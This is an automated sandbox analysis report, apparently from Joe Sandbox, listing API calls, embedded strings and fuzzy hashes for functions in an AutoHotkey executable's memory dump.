                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AsyncSelect$_memmoveioctlsocket
                                      • String ID: <error code="%i"/></response>$<response command="%s" transaction_id="%e$<response command="%s" transaction_id="%e"/>
                                      • API String ID: 1565968819-3791457405
                                      • Opcode ID: 6293f0b70115966cd890f029f067f341165aeb261ffacef0fc3cfd90e9beaf65
                                      • Instruction ID: a0d4fea40d04f298390c3b6366d4478668eaeb7cb91e1d43c9ed42f2878b4ebb
                                      • Opcode Fuzzy Hash: 6293f0b70115966cd890f029f067f341165aeb261ffacef0fc3cfd90e9beaf65
                                      • Instruction Fuzzy Hash: D45107716003059FCB21ABA48D80AAFB7F9EF04318F11067FE953A26D1DB79E915CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Extra$File$Line$Message$The current thread will exit.$__Delete will now return.
                                      • API String ID: 3832890014-175628360
                                      • Opcode ID: 50d2c3bdaa089d4f3d6cddae98d8302b718adf4fe73319883dbae5867f643d73
                                      • Instruction ID: eaa58461f46acdebf79f04a6496b7663cd2e516db01c17dd502ae03936a8bde0
                                      • Opcode Fuzzy Hash: 50d2c3bdaa089d4f3d6cddae98d8302b718adf4fe73319883dbae5867f643d73
                                      • Instruction Fuzzy Hash: 9A51D1307842009FD718EB148841B6A73E0AB88758F09546EFAC4AB392D77DDD66C79F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcsicoll.LIBCMT ref: 00477048
                                      • CreatePopupMenu.USER32 ref: 00477074
                                      • SetMenuDefaultItem.USER32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00477448), ref: 004770B8
                                      • SetMenuInfo.USER32 ref: 004770FE
                                      • SetMenuInfo.USER32 ref: 00477121
                                      • CreateMenu.USER32 ref: 00477137
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Menu$CreateInfo$DefaultItemPopup__wcsicoll
                                      • String ID: tray
                                      • API String ID: 3246407819-3344156567
                                      • Opcode ID: 8b47f5f2684e0ee5814e0879d7ca6895583ab5354028b432afb37b8cdcf1da0c
                                      • Instruction ID: 947ce2e608446726554db0e0f7efeb127ec8dadf31759c310087540cbe648b85
                                      • Opcode Fuzzy Hash: 8b47f5f2684e0ee5814e0879d7ca6895583ab5354028b432afb37b8cdcf1da0c
                                      • Instruction Fuzzy Hash: 84316C716087419FD720DF29C944B9BBBE5BF88704F548A1EE88D93750E778E8048B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __getptd.LIBCMT ref: 0049D5C4
                                        • Part of subcall function 0049DF62: __getptd_noexit.LIBCMT ref: 0049DF65
                                        • Part of subcall function 0049DF62: __amsg_exit.LIBCMT ref: 0049DF72
                                      • __amsg_exit.LIBCMT ref: 0049D5E4
                                      • __lock.LIBCMT ref: 0049D5F4
                                      • InterlockedDecrement.KERNEL32(?), ref: 0049D611
                                      • _free.LIBCMT ref: 0049D624
                                      • InterlockedIncrement.KERNEL32(02D92CE0), ref: 0049D63C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID: `@M
                                      • API String ID: 3470314060-1333944346
                                      • Opcode ID: 573b3ed20a71bd5f659af121bbfd634c332faa6f251ed7d2f4ce13b26854a822
                                      • Instruction ID: 7e5a71eb571a4062cb2ac3217691c3a90a173eca235a37da356c3c3c2da90d2f
                                      • Opcode Fuzzy Hash: 573b3ed20a71bd5f659af121bbfd634c332faa6f251ed7d2f4ce13b26854a822
                                      • Instruction Fuzzy Hash: B301C432D01621ABCF11AF699806B5E7F60BF44725F11803BE406A7280DB3CAD81CBDD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468358
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00468375
                                      • GetForegroundWindow.USER32 ref: 0046838C
                                      • GetFocus.USER32 ref: 00468397
                                      • EnableWindow.USER32(?,00000000), ref: 004683B5
                                      • GetFocus.USER32 ref: 004683BF
                                      • SetFocus.USER32(?), ref: 004683CD
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FocusWindow$EnableForegroundLongMessageSend_free
                                      • String ID:
                                      • API String ID: 3052119755-0
                                      • Opcode ID: 02da4894517ef00b9a46d8e4a0c650a935d787487ef7698c3a92ea0f7426b96b
                                      • Instruction ID: 52e4c2df40dd0d5995f3717137ccf4beeee9f9f00966a9dbfd038161cd62d1b3
                                      • Opcode Fuzzy Hash: 02da4894517ef00b9a46d8e4a0c650a935d787487ef7698c3a92ea0f7426b96b
                                      • Instruction Fuzzy Hash: 6921F870A042049BDB109F74DC94B5F3BA0AB55720F18862FF8568B380EB79D941DB1F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: =$=$Next
                                      • API String ID: 0-1239710179
                                      • Opcode ID: dc9dd342dfc16d3f3eabcc8ac0d8b797d0f112ffa1d712f29ba8b74a49aaf177
                                      • Instruction ID: 866ada5e4e5a5a78902083bbf2e2a33570dab7e46549db43fcecda7eeee6e469
                                      • Opcode Fuzzy Hash: dc9dd342dfc16d3f3eabcc8ac0d8b797d0f112ffa1d712f29ba8b74a49aaf177
                                      • Instruction Fuzzy Hash: DDB1BEB1A08785AFC724DF54C981A5BB7E0BB85304F44492FF19987391E7B8D849CB4B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • </response>, xrefs: 004086D1
                                      • <response command="source" success="0" transaction_id="%e"/>, xrefs: 0040872A
                                      • <response command="source" success="1" transaction_id="%e" encoding="base64">, xrefs: 0040856C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcstoui64$__wcsicoll
                                      • String ID: </response>$<response command="source" success="0" transaction_id="%e"/>$<response command="source" success="1" transaction_id="%e" encoding="base64">
                                      • API String ID: 400967290-3891583944
                                      • Opcode ID: 3d59892804f93d2430410bdb32401bf7b2d59b9f9cfec3c486383cdca5ca5682
                                      • Instruction ID: 0e36fcbb1e22d9825cb84a5c7b15b6e39fb81a455be12b99d2f99ce50ef03238
                                      • Opcode Fuzzy Hash: 3d59892804f93d2430410bdb32401bf7b2d59b9f9cfec3c486383cdca5ca5682
                                      • Instruction Fuzzy Hash: 9191CF311083419BD720DF29CA81B5BB7E4AB94314F144A3EF5D4E72D2EB39D8058B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcstoi64.LIBCMT ref: 0044C66F
                                        • Part of subcall function 0049A060: wcstoxq.LIBCMT ref: 0049A081
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcstoi64wcstoxq
                                      • String ID:
                                      • API String ID: 2194140525-0
                                      • Opcode ID: a96fc1622a8cad5d22cff9e1e6456e46a53199aa9b42a8b1bcf950152149f4d9
                                      • Instruction ID: 50ece932841a029463a5d57d7f4fa014c0860c94bd5a9321900d5679743e54f0
                                      • Opcode Fuzzy Hash: a96fc1622a8cad5d22cff9e1e6456e46a53199aa9b42a8b1bcf950152149f4d9
                                      • Instruction Fuzzy Hash: 2BA1F1716093019BE360DF25DC81F5BB7E4BB84B14F184A2FF5949B2D0DB78A805CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetTimer.USER32(0002044A,00000009,0000000A,00000000), ref: 00423684
                                      • KillTimer.USER32(0002044A,00000009), ref: 004236CD
                                      • __wcstoi64.LIBCMT ref: 00423751
                                      • __fassign.LIBCMT ref: 004237E1
                                      • GetTickCount.KERNEL32 ref: 00423805
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Timer__fassign$CountKillTick__wcstoi64
                                      • String ID: Out of memory.
                                      • API String ID: 925375575-4087320997
                                      • Opcode ID: 17a019a68782e432456c5e20817b237dbaef85f5ffde172dd320f88de4622f9f
                                      • Instruction ID: 1b0ba90a2ca323a07b83d4e7e28bad831eab04f26b33dcde371b281977b79573
                                      • Opcode Fuzzy Hash: 17a019a68782e432456c5e20817b237dbaef85f5ffde172dd320f88de4622f9f
                                      • Instruction Fuzzy Hash: 518126F1B00360ABDF349F15A880727BBF4AF51705F58446FE4868A791E37C9A84C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CoInitialize.OLE32 ref: 0045E5CB
                                      • CoCreateInstance.OLE32(004AD820,00000000,00000001,004AD810,00000000), ref: 0045E5E4
                                      • __fassign.LIBCMT ref: 0045E656
                                      • GetKeyboardLayout.USER32(00000000), ref: 0045E6A0
                                      • __fassign.LIBCMT ref: 0045E6F1
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 0045E73E
                                      • CoUninitialize.OLE32 ref: 0045E78F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __fassign$CreateFullInitializeInstanceKeyboardLayoutNamePathUninitialize
                                      • String ID:
                                      • API String ID: 404581262-0
                                      • Opcode ID: b14142beedf871b8961df21b345b22b46e5239afd347ff8266b5eb3752589e01
                                      • Instruction ID: 5284303a1726f87cd4c98a1307fd75b87fe7ed5e41c5e86c3c7f21c300e6447d
                                      • Opcode Fuzzy Hash: b14142beedf871b8961df21b345b22b46e5239afd347ff8266b5eb3752589e01
                                      • Instruction Fuzzy Hash: 3D61EFB0204301AFD218EF64CC84FAB77A5AF99704F10485DF9449B2D2D7B9ED49C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0042B40A
                                      • _wcschr.LIBCMT ref: 0042B425
                                        • Part of subcall function 0042B270: GetFileAttributesW.KERNEL32(0042B33F,00000000,?,00000000), ref: 0042B2A0
                                        • Part of subcall function 0044F7D0: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 0044F7E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: AttributesFile$FolderPath_wcschr
                                      • String ID: #Include %-0.*s#IncludeAgain %s$.ahk$\AutoHotkey\Lib\$\Lib\
                                      • API String ID: 3341327518-2992999288
                                      • Opcode ID: 65168d809d77c541dccfd6a0f91f569833fc23373cbdcc7b4ac0846ede3acb22
                                      • Instruction ID: aca0cd2f48d07780b1f690afb8553c7a90bdd57ff97b266b6ccc015802d10e61
                                      • Opcode Fuzzy Hash: 65168d809d77c541dccfd6a0f91f569833fc23373cbdcc7b4ac0846ede3acb22
                                      • Instruction Fuzzy Hash: BF61D1317002159FD710DF28E881BAB73A4EF95318F40452FF9458B3A2EB78A955C7EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CountTick_free_wcsncpy
                                      • String ID: 6Dd$OnMessage$call
                                      • API String ID: 2355968416-2965414497
                                      • Opcode ID: 94aa33ef4542e3fb1d5e745e578a54d34f45c8483eb8e71d96474b0f5380e880
                                      • Instruction ID: e06a679a2f8b3723799ba155fb6c03cc7529b83a70cecacdadb6cc47ba399112
                                      • Opcode Fuzzy Hash: 94aa33ef4542e3fb1d5e745e578a54d34f45c8483eb8e71d96474b0f5380e880
                                      • Instruction Fuzzy Hash: 3D718AB1605340CFC720DF29D88099BBBE9FB85305B18897FE4899B361D739E905CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • __fassign.LIBCMT ref: 00440724
                                        • Part of subcall function 0049BF9D: wcstoxl.LIBCMT ref: 0049BFAD
                                      • __fassign.LIBCMT ref: 00440760
                                      • GetWindowRect.USER32(00000000,?), ref: 004407A6
                                      • GetWindowRect.USER32(00000000,?), ref: 004407D8
                                      • GetParent.USER32(00000000), ref: 00440803
                                      • ScreenToClient.USER32(00000000,80000000), ref: 00440813
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000001,?,?,?,?,?,?,?,?,00433089), ref: 004408BA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$Rect__fassign$ClientForegroundMoveParentScreenVisiblewcstoxl
                                      • String ID:
                                      • API String ID: 4198355719-0
                                      • Opcode ID: e589524636ec4758f63786f72f9a228125c27e4cbb4b0c95fd1acbcf600f3f9b
                                      • Instruction ID: 615de26f4d091cdac34427a22d3fd61f551544865516f3abe097c860466729f0
                                      • Opcode Fuzzy Hash: e589524636ec4758f63786f72f9a228125c27e4cbb4b0c95fd1acbcf600f3f9b
                                      • Instruction Fuzzy Hash: F251CD71A043019BE710EF249C81B5B77E4AB84750F14092EFA45AB391D77CEC95CBAB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCursorPos.USER32(004D8620), ref: 00417778
                                      • GetSystemMetrics.USER32(00000000), ref: 004177F0
                                      • GetSystemMetrics.USER32(00000001), ref: 004177F6
                                      • GetCursorPos.USER32(?), ref: 00417855
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CursorMetricsSystem
                                      • String ID: d
                                      • API String ID: 3091566494-2564639436
                                      • Opcode ID: 0ab173258bfbc79ebe5f79f04c1e0a29e8bec6fbf91122351addc25f7814e17a
                                      • Instruction ID: dfb326f163c00021a23dabafdc4329bef19cbd18e99c5c13a5ba0fcf293a0a84
                                      • Opcode Fuzzy Hash: 0ab173258bfbc79ebe5f79f04c1e0a29e8bec6fbf91122351addc25f7814e17a
                                      • Instruction Fuzzy Hash: C0519E75B092028BD714DF18D881BAA77E1BB88714F14493EE886C7341DB39E989CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcstoui64.LIBCMT ref: 004713B7
                                      • GetDlgCtrlID.USER32(00000000), ref: 004713C2
                                      • GetParent.USER32(00000000), ref: 004713D1
                                      • GetDlgCtrlID.USER32(00000000), ref: 004713DE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Ctrl$Parent__wcstoui64
                                      • String ID:
                                      • API String ID: 2645479964-0
                                      • Opcode ID: 6f5ffaa6941be87318af1f61cdec3181d4bc5529197e71192db96c64a764c201
                                      • Instruction ID: bb57b39d41510f8c91a2e896f5283da17579297f67e8f0a29fc8fbae80f25e4e
                                      • Opcode Fuzzy Hash: 6f5ffaa6941be87318af1f61cdec3181d4bc5529197e71192db96c64a764c201
                                      • Instruction Fuzzy Hash: 4541F1327002015BDB209E2CDC85BFF73A6EB81715F158437FA059B2A1DB39E85687AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __fassign_wcschr$wcstoxl
                                      • String ID: .-+$1.1.37.01
                                      • API String ID: 1230976502-4065018320
                                      • Opcode ID: ce88e834ff6540ac4c34ef827675916ab095229ad5d39cd337bc334b64f94041
                                      • Instruction ID: 8473a6dbccc63186dee87f0a8676d8d5553935e9c115bff7946f0a535ef4da0d
                                      • Opcode Fuzzy Hash: ce88e834ff6540ac4c34ef827675916ab095229ad5d39cd337bc334b64f94041
                                      • Instruction Fuzzy Hash: 4931A7F6B04215868F247A169AC123F73D4EB55761F240E6BF412C6290E7EC8DC5936B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __wcsicoll.LIBCMT ref: 0046772D
                                        • Part of subcall function 00474310: GetPropW.USER32(?,ahk_autosize), ref: 00474324
                                        • Part of subcall function 00474310: RemovePropW.USER32(?,ahk_autosize), ref: 0047433F
                                        • Part of subcall function 00474310: GetWindowRect.USER32(?,?), ref: 0047437E
                                        • Part of subcall function 00474310: GetWindowRect.USER32(?,?), ref: 004743BF
                                        • Part of subcall function 00474310: MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 00474400
                                        • Part of subcall function 00474310: GetWindowLongW.USER32(?,000000F0), ref: 0047441C
                                      • _free.LIBCMT ref: 0046785E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$PropRect$LongPointsRemove__wcsicoll_free
                                      • String ID: Exact$Parameter #2 invalid.$Parameter #3 invalid.$Tab name doesn't exist yet.
                                      • API String ID: 1019984171-577477998
                                      • Opcode ID: 20326a5ba1ce4a8c80f9fdbb2dd063690e1a21785f64bc7c705d2543bd5d0961
                                      • Instruction ID: 0f5877889ab81f2fb16a6c53c855da9c5bfb7546a189e2cfcbc2c4ee9d3138a9
                                      • Opcode Fuzzy Hash: 20326a5ba1ce4a8c80f9fdbb2dd063690e1a21785f64bc7c705d2543bd5d0961
                                      • Instruction Fuzzy Hash: 5A419130A0D3408ACB209F6588407AE7BE5AB91358F18491FF9858B392E77CDD45C7AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • Parameter #1 must not be blank in this case., xrefs: 0043356C
                                      • Delete, xrefs: 004335B3
                                      • Target label does not exist., xrefs: 0043350C
                                      • Parameter #2 invalid., xrefs: 004335EA
                                      • Parameter #1 invalid., xrefs: 00433536
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Delete$Parameter #1 invalid.$Parameter #1 must not be blank in this case.$Parameter #2 invalid.$Target label does not exist.
                                      • API String ID: 3832890014-14243736
                                      • Opcode ID: d73222ed3f77a20571a5772824bb5952d45f75951e80014aafe066afec3bb9de
                                      • Instruction ID: 3c56a17159200bc7323e9082a88066785b87e6399f1e11d670167195e7c504db
                                      • Opcode Fuzzy Hash: d73222ed3f77a20571a5772824bb5952d45f75951e80014aafe066afec3bb9de
                                      • Instruction Fuzzy Hash: 4741D471B842007BEB209E158C02F6B73B5AB89715F24542FF8189B391D7BDEE41876E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,0043397D,?,00000000), ref: 0048628C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ForegroundWindow
                                      • String ID:
                                      • API String ID: 2020703349-0
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: +-*&~!$-$Expression too long$Missing close-quote$Out of memory.
                                      • API String ID: 2691759472-2428279368
                                      APIs
                                      • SendMessageW.USER32(?,00000192), ref: 0046B0BE
                                      • SendMessageW.USER32(?,00000030,?,?), ref: 0046B0F3
                                      • SendMessageW.USER32 ref: 0046B107
                                      • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0046B120
                                      • GetSystemMetrics.USER32(00000003), ref: 0046B133
                                      • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0046B165
                                      • GetSystemMetrics.USER32(00000003), ref: 0046B189
                                      Similarity
                                      • API ID: MessageSend$MetricsSystem
                                      • String ID:
                                      • API String ID: 3542082049-0
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: ComObj$ComObjArray$ComObjRef$ComObject
                                      • API String ID: 0-4247866589
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0047388C
                                      • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004738A0
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004738CF
                                      • GetSysColor.USER32(00000005), ref: 004738E3
                                      • SendMessageW.USER32(?,00001026,00000000,?), ref: 004738F6
                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 00473903
                                      • InvalidateRect.USER32(00000000,00000000,00000001,?,0000000B,00000000,00000000,?,00000192,?,?), ref: 0047390C
                                      Similarity
                                      • API ID: MessageSend$ColorInvalidateRect
                                      • String ID:
                                      • API String ID: 2722326260-0
                                      APIs
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044A16E
                                      • mciSendStringW.WINMM(status cd mode,?,00000080,00000000), ref: 0044A187
                                      • mciSendStringW.WINMM(close cd wait,00000000,00000000,00000000), ref: 0044A196
                                      Strings
                                      • status cd mode, xrefs: 0044A182
                                      • open %s type cdaudio alias cd wait shareable, xrefs: 0044A146
                                      • close cd wait, xrefs: 0044A18F
                                      Similarity
                                      • API ID: SendString$_vswprintf_s
                                      • String ID: close cd wait$open %s type cdaudio alias cd wait shareable$status cd mode
                                      • API String ID: 3589064202-1182961480
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: FAST$RegEx$SLOW
                                      • API String ID: 0-3371325577
                                      APIs
                                      • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00484437
                                      • GetTickCount.KERNEL32 ref: 00484450
                                      • IsWindow.USER32(00000000), ref: 0048446A
                                      • GetTickCount.KERNEL32 ref: 00484474
                                      • IsWindow.USER32(00000000), ref: 0048448F
                                        • Part of subcall function 0045F490: SendMessageTimeoutW.USER32(00000000,00000010,00000000,00000000,00000002,000001F4,?), ref: 0045F4A9
                                        • Part of subcall function 0045F490: GetWindowThreadProcessId.USER32(00000000,?), ref: 0045F4BD
                                        • Part of subcall function 0045F490: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0045F4D3
                                        • Part of subcall function 0045F490: TerminateProcess.KERNEL32(00000000,00000000), ref: 0045F4E2
                                        • Part of subcall function 0045F490: CloseHandle.KERNEL32(00000000), ref: 0045F4E9
                                      Strings
                                      Similarity
                                      • API ID: ProcessWindow$CountMessageTick$CloseHandleOpenPostSendTerminateThreadTimeout
                                      • String ID: ?-C
                                      • API String ID: 1366898224-529084794
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Interrupt$NoTimers$Priority
                                      • API String ID: 3832890014-3223323590
                                      APIs
                                      • __getptd.LIBCMT ref: 004AB723
                                        • Part of subcall function 0049DF62: __getptd_noexit.LIBCMT ref: 0049DF65
                                        • Part of subcall function 0049DF62: __amsg_exit.LIBCMT ref: 0049DF72
                                      • __getptd.LIBCMT ref: 004AB734
                                      • __getptd.LIBCMT ref: 004AB742
                                      Strings
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(?,-0000F939,00000000,?,00000000,00000000,00000000,00000000), ref: 0045596A
                                      • GetLastError.KERNEL32 ref: 00455970
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00455993
                                      • WideCharToMultiByte.KERNEL32(?,-0000F939,00000000,?,00010000,00000000,00000000,00000000), ref: 004559CB
                                      • MultiByteToWideChar.KERNEL32(000004B0,00000000,00010000,00000000,00000000,00000000), ref: 00455A03
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00010000,00000000,?,?), ref: 00455A2F
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      APIs
                                      Similarity
                                      • API ID: Unregister_memset
                                      • String ID:
                                      • API String ID: 2392160147-0
                                      APIs
                                      • _ValidateScopeTableHandlers.LIBCMT ref: 004AC5A1
                                      • __FindPESection.LIBCMT ref: 004AC5BB
                                      Similarity
                                      • API ID: FindHandlersScopeSectionTableValidate
                                      • String ID:
                                      • API String ID: 876702719-0
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Caps_memset
                                      • String ID: 4$@
                                      • API String ID: 675830301-1528247400
